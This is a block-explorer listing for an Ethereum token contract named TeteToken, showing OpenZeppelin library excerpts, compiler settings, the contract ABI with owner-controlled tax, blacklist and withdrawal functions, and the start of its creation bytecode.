returndata, string memory errorMessage ) internal view returns (bytes memory) { if (success) { if (returndata.length == 0) { // only check isContract if the call was successful and the return data is empty // otherwise we already know that it was a contract require(isContract(target), "Address: call to non-contract"); } return returndata; } else { _revert(returndata, errorMessage); } } /** * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason or using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { _revert(returndata, errorMessage); } } function _revert(bytes memory returndata, string memory errorMessage) private pure { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly /// @solidity memory-safe-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"swap","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"botAddress","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"BlacklistedUser","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromMaxWallet","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokenAmount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ETHAmount","type":"uint256"}],"name":"LiquidityAdded","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"MaxWalletAmountUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"_enabled","type":"bool"}],"name":"SwapAndLiquifyEnabledUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"devFee","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"treasuryFee","type":"uint256"}],"name":"TreasuryAndDevFeesAdded","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previous","type":"address"},{"indexed":true,"internalType":"address","name":"adr","type":"address"}],"name":"setDevAddress","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previous","type":"address"},{"indexed":true,"internalType":"address","name":"adr","type":"address"}],"name":"setMktAddress","type":"event"},{"inputs":[],"name":"AppliedRatesPercentage","outputs":[{"internalType":"uint256","name":"BurnTax","type":"uint256"},{"internalType":"uint256","name":"LiquidityTax","type":"uint256"},{"internalType":"uint256","name":"MarketingTax","type":"uint256"},{"internalType":"uint256","name":"DevelopmentTax","type":"uint256"},{"internalType":"uint256","name":"RewardTax","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"AutomatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"Bots","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"BuyingTaxes","outputs":[{"internalType":"uint256","name":"BurnTax","type":"uint256"},{"internalType":"uint256","name":"LiquidityTax","type":"uint256"},{"internalType":"uint256","name":"MarketingTax","type":"uint256"},{"internalType":"uint256","name":"DevelopmentTax","type":"uint256"},{"internalType":"uint256","name":"RewardTax","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address payable","name":"newDevAddress","type":"address"}],"name":"ChangeDevAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"add","type":"address"},{"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ChangeExcludeFromFeeToForWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"marketingAddress","type":"address"}],"name":"ChangeMarketingAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"uint256","name":"BurnTax","type":"uint256"},{"internalType":"uint256","name":"LiquidityTax","type":"uint256"},{"internalType":"uint256","name":"MarketingTax","type":"uint256"},{"internalType":"uint256","name":"DevelopmentTax","type":"uint256"},{"internalType":"uint256","name":"RewardTax","type":"uint256"}],"internalType":"struct TeteToken.TaxRates","name":"newTaxes","type":"tuple"},{"internalType":"bool","name":"buying","type":"bool"}],"name":"ChangeTaxes","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"HardCap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"HardCapBuy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"HardCapSell","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"targetAddress","type":"address"},{"internalType":"bool","name":"isBot","type":"bool"}],"name":"MarkBot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"SellTaxes","outputs":[{"internalType":"uint256","name":"BurnTax","type":"uint256"},{"internalType":"uint256","name":"LiquidityTax","type":"uint256"},{"internalType":"uint256","name":"MarketingTax","type":"uint256"},{"internalType":"uint256","name":"DevelopmentTax","type":"uint256"},{"internalType":"uint256","name":"RewardTax","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"newFlag","type":"bool"}],"name":"SetAutoLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"pct","type":"uint256"}],"name":"SwapPct","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"TotalFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"TotalSwapped","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"TotalTokenBurn","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"UniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"WalletsExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"WalletsExcludedFromHardCap","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"WeAreLive","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"pct","type":"uint256"}],"name":"setMaxBag","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"pct","type":"uint256"}],"name":"setMaxBuy","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"pct","type":"uint256"}],"name":"setMaxSell","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setSwapAndLiquifyEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"reflactionaryAmount","type":"uint256"}],"name":"tokenFromReflection","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
608060405273118afdca0474cc06250efe04d66aa6752fb68b0b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550738347b4fb67059f060b7679325656cc653bdcc5f4600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000601760006101000a81548160ff0219169083151502179055506000601760016101000a81548160ff0219169083151502179055506001601760026101000a81548160ff0219169083151502179055506001601760036101000a81548160ff0219169083151502179055506040518060a001604052806000815260200160018152602001600981526020016000815260200160008152506018600082015181600001556020820151816001015560408201518160020155606082015181600301556080820151816004015550506040518060a001604052806000815260200160028152602001601c8152602001600081526020016000815250601d6000820151816000015560208201518160010155604082015181600201556060820151816003015560808201518160040155505060186022600082015481600001556001820154816001015560028201548160020155600382015481600301556004820154816004015550506040518060e0016040528060008152602001600081526020016000815260200160008152602001600081526020016000815260200160008152506027600082015181600001556020820151816001015560408201518160020155606082015181600301556080820151816004015560a0820151816005015560c082015181600601555050348015620002a757600080fd5b5060405162005be538038062005be58339818101604052810190620002cd919062001398565b81818160039081620002e091906200167d565b508060049081620002f291906200167d565b505050620003156200030962000d8060201b60201c565b62000d8860201b60201c565b82600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620003c6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003ec919062001764565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000476573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200049c919062001764565b6040518363ffffffff1660e01b8152600401620004bb929190620017a7565b6020604051808303816000875af1158015620004db573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000501919062001764565b90506001601360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601160003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160116000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160116000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160116000737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160116000735da78399448d29e7a560c8bfe74d1a9ffe8eadcb73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016011600073846a03b7c94efa9e70462ed117aa2344238534f773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016011600073cd9375d40ff8cf1f34796b364870207a0fd88dec73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016011600073c020a0e0accaa31dc432ffaa4726fac2bcf3186d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601260003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160126000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160126000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160126000737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555062000c50336a52b7d2dcc80cd2e400000062000e4e60201b60201c565b62000c8730600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660001962000fbb60201b60201c565b62000c976200118c60201b60201c565b60001962000ca6919062001803565b60001962000cb591906200186a565b600681905550600654600e60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555062000d116200118c60201b60201c565b600a8190555062000d276200118c60201b60201c565b600c8190555062000d3d6200118c60201b60201c565b600b81905550612710600562000d586200118c60201b60201c565b62000d649190620018a5565b62000d709190620018f0565b600d819055505050505062001b44565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000ec0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000eb79062001989565b60405180910390fd5b62000ed4600083836200119660201b60201c565b806002600082825462000ee89190620019ab565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000f9b9190620019f7565b60405180910390a362000fb7600083836200119b60201b60201c565b5050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036200102d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620010249062001a8a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200109f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620010969062001b22565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516200117f9190620019f7565b60405180910390a3505050565b6000600254905090565b505050565b505050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620011e182620011b4565b9050919050565b620011f381620011d4565b8114620011ff57600080fd5b50565b6000815190506200121381620011e8565b92915050565b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200126e8262001223565b810181811067ffffffffffffffff8211171562001290576200128f62001234565b5b80604052505050565b6000620012a5620011a0565b9050620012b3828262001263565b919050565b600067ffffffffffffffff821115620012d657620012d562001234565b5b620012e18262001223565b9050602081019050919050565b60005b838110156200130e578082015181840152602081019050620012f1565b60008484015250505050565b6000620013316200132b84620012b8565b62001299565b90508281526020810184848401111562001350576200134f6200121e565b5b6200135d848285620012ee565b509392505050565b600082601f8301126200137d576200137c62001219565b5b81516200138f8482602086016200131a565b91505092915050565b600080600060608486031215620013b457620013b3620011aa565b5b6000620013c48682870162001202565b935050602084015167ffffffffffffffff811115620013e857620013e7620011af565b5b620013f68682870162001365565b925050604084015167ffffffffffffffff8111156200141a5762001419620011af565b5b620014288682870162001365565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200148557607f821691505b6020821081036200149b576200149a6200143d565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620015057fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620014c6565b620015118683620014c6565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200155e62001558620015528462001529565b62001533565b62001529565b9050919050565b6000819050919050565b6200157a836200153d565b62001592620015898262001565565b848454620014d3565b825550505050565b600090565b620015a96200159a565b620015b68184846200156f565b505050565b5b81811015620015de57620015d26000826200159f565b600181019050620015bc565b5050565b601f8211156200162d57620015f781620014a1565b6200160284620014b6565b8101602085101562001612578190505b6200162a6200162185620014b6565b830182620015bb565b50505b505050565b600082821c905092915050565b6000620016526000198460080262001632565b1980831691505092915050565b60006200166d83836200163f565b9150826002028217905092915050565b620016888262001432565b67ffffffffffffffff811115620016a457620016a362001234565b5b620016b082546200146c565b620016bd828285620015e2565b600060209050601f831160018114620016f55760008415620016e0578287015190505b620016ec85826200165f565b8655506200175c565b601f1984166200170586620014a1565b60005b828110156200172f5784890151825560018201915060208501945060208101905062001708565b868310156200174f57848901516200174b601f8916826200163f565b8355505b6001600288020188555050505b505050505050565b6000602082840312156200177d576200177c620011aa565b5b60006200178d8482850162001202565b91505092915050565b620017a181620011d4565b82525050565b6000604082019050620017be600083018562001796565b620017cd602083018462001796565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620018108262001529565b91506200181d8362001529565b92508262001830576200182f620017d4565b5b828206905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620018778262001529565b9150620018848362001529565b92508282039050818111156200189f576200189e6200183b565b5b92915050565b6000620018b28262001529565b9150620018bf8362001529565b9250828202620018cf8162001529565b91508282048414831517620018e957620018e86200183b565b5b5092915050565b6000620018fd8262001529565b91506200190a8362001529565b9250826200191d576200191c620017d4565b5b828204905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062001971601f8362001928565b91506200197e8262001939565b602082019050919050565b60006020820190508181036000830152620019a48162001962565b9050919050565b6000620019b88262001529565b9150620019c58362001529565b9250828201905080821115620019e057620019df6200183b565b5b92915050565b620019f18162001529565b82525050565b600060208201905062001a0e6000830184620019e6565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600062001a7260248362001928565b915062001a7f8262001a14565b604082019050919050565b6000602082019050818103600083015262001aa58162001a63565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600062001b0a60228362001928565b915062001b178262001aac565b604082019050919050565b6000602082019050818103600083015262001b3d8162001afb565b9050919050565b6140918062001b546000396000f3fe6080604052600436106102555760003560e01c806373f33bd311610139578063b897a7f2116100b6578063df2abc241161007a578063df2abc24146108fd578063ef998cf014610926578063f2bc6ea41461094f578063f2fde38b1461097e578063f53bc835146109a7578063fc962edb146109d05761025c565b8063b897a7f214610804578063c49b9a801461082f578063c592720714610858578063d43ad1e914610895578063dd62ed3e146108c05761025c565b80639cc29950116100fd5780639cc29950146106f3578063a457c2d714610730578063a9059cbb1461076d578063a98aa6ee146107aa578063a9c21468146107d55761025c565b806373f33bd31461060e5780638da5cb5b1461063757806395d89b411461066257806399ec86fe1461068d5780639b4f462d146106b65761025c565b806339509351116101d25780635040c6e7116101965780635040c6e714610500578063570eafa71461052b57806368dc04c31461056857806370a0823114610591578063715018a6146105ce57806372a2f352146105e55761025c565b8063395093511461042d5780633ccfd60b1461046a578063407bf9c2146104815780634947a42c146104ac5780634d3314f4146104d55761025c565b80631850e44f116102195780631850e44f1461034857806323b872dd1461037157806327b82704146103ae5780632d838119146103c5578063313ce567146104025761025c565b8063055add0d1461026157806306fdde031461028c578063095ea7b3146102b75780630a4ea202146102f457806318160ddd1461031d5761025c565b3661025c57005b600080fd5b34801561026d57600080fd5b506102766109ff565b6040516102839190612d3c565b60405180910390f35b34801561029857600080fd5b506102a1610a25565b6040516102ae9190612de7565b60405180910390f35b3480156102c357600080fd5b506102de60048036038101906102d99190612e8c565b610ab7565b6040516102eb9190612ee7565b60405180910390f35b34801561030057600080fd5b5061031b60048036038101906103169190612f40565b610ada565b005b34801561032957600080fd5b50610332610c02565b60405161033f9190612f7c565b60405180910390f35b34801561035457600080fd5b5061036f600480360381019061036a9190612fc3565b610c0c565b005b34801561037d57600080fd5b5061039860048036038101906103939190613003565b610c6f565b6040516103a59190612ee7565b60405180910390f35b3480156103ba57600080fd5b506103c3610c9e565b005b3480156103d157600080fd5b506103ec60048036038101906103e79190613056565b610cc3565b6040516103f99190612f7c565b60405180910390f35b34801561040e57600080fd5b50610417610d24565b604051610424919061309f565b60405180910390f35b34801561043957600080fd5b50610454600480360381019061044f9190612e8c565b610d2d565b6040516104619190612ee7565b60405180910390f35b34801561047657600080fd5b5061047f610d64565b005b34801561048d57600080fd5b50610496610dfd565b6040516104a39190612f7c565b60405180910390f35b3480156104b857600080fd5b506104d360048036038101906104ce91906130ba565b610e03565b005b3480156104e157600080fd5b506104ea610eed565b6040516104f79190612f7c565b60405180910390f35b34801561050c57600080fd5b50610515610ef3565b6040516105229190612f7c565b60405180910390f35b34801561053757600080fd5b50610552600480360381019061054d91906130e7565b610ef9565b60405161055f9190612ee7565b60405180910390f35b34801561057457600080fd5b5061058f600480360381019061058a9190613056565b610f19565b005b34801561059d57600080fd5b506105b860048036038101906105b391906130e7565b610f54565b6040516105c59190612f7c565b60405180910390f35b3480156105da57600080fd5b506105e3610fa5565b005b3480156105f157600080fd5b5061060c60048036038101906106079190613056565b610fb9565b005b34801561061a57600080fd5b5061063560048036038101906106309190613220565b610fe9565b005b34801561064357600080fd5b5061064c611071565b604051610659919061326f565b60405180910390f35b34801561066e57600080fd5b5061067761109b565b6040516106849190612de7565b60405180910390f35b34801561069957600080fd5b506106b460048036038101906106af9190612f40565b61112d565b005b3480156106c257600080fd5b506106dd60048036038101906106d891906130e7565b611255565b6040516106ea9190612ee7565b60405180910390f35b3480156106ff57600080fd5b5061071a600480360381019061071591906130e7565b611275565b6040516107279190612ee7565b60405180910390f35b34801561073c57600080fd5b5061075760048036038101906107529190612e8c565b611295565b6040516107649190612ee7565b60405180910390f35b34801561077957600080fd5b50610794600480360381019061078f9190612e8c565b61130c565b6040516107a19190612ee7565b60405180910390f35b3480156107b657600080fd5b506107bf61132f565b6040516107cc9190612f7c565b60405180910390f35b3480156107e157600080fd5b506107ea611335565b6040516107fb95949392919061328a565b60405180910390f35b34801561081057600080fd5b50610819611359565b6040516108269190612f7c565b60405180910390f35b34801561083b57600080fd5b50610856600480360381019061085191906130ba565b61135f565b005b34801561086457600080fd5b5061087f600480360381019061087a91906130e7565b6113bb565b60405161088c9190612ee7565b60405180910390f35b3480156108a157600080fd5b506108aa6113db565b6040516108b79190612f7c565b60405180910390f35b3480156108cc57600080fd5b506108e760048036038101906108e291906132dd565b6113e1565b6040516108f49190612f7c565b60405180910390f35b34801561090957600080fd5b50610924600480360381019061091f9190612fc3565b611468565b005b34801561093257600080fd5b5061094d60048036038101906109489190613056565b611505565b005b34801561095b57600080fd5b50610964611535565b60405161097595949392919061328a565b60405180910390f35b34801561098a57600080fd5b506109a560048036038101906109a091906130e7565b611559565b005b3480156109b357600080fd5b506109ce60048036038101906109c99190613056565b6115dc565b005b3480156109dc57600080fd5b506109e561160c565b6040516109f695949392919061328a565b60405180910390f35b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610a349061334c565b80601f0160208091040260200160405190810160405280929190818152602001828054610a609061334c565b8015610aad5780601f10610a8257610100808354040283529160200191610aad565b820191906000526020600020905b815481529060010190602001808311610a9057829003601f168201915b5050505050905090565b600080610ac2611630565b9050610acf818585611638565b600191505092915050565b610ae2611801565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f0f9ab6c7b3a29f5eca7cf80f42ea6b1262432064b221200268394c9a5e63569f60405160405180910390a3610b90600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000610c0c565b81600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610bfe600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001610c0c565b5050565b6000600254905090565b610c14611801565b80601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600080610c7a611630565b9050610c8785828561187f565b610c9285858561190b565b60019150509392505050565b610ca6611801565b6001601760006101000a81548160ff0219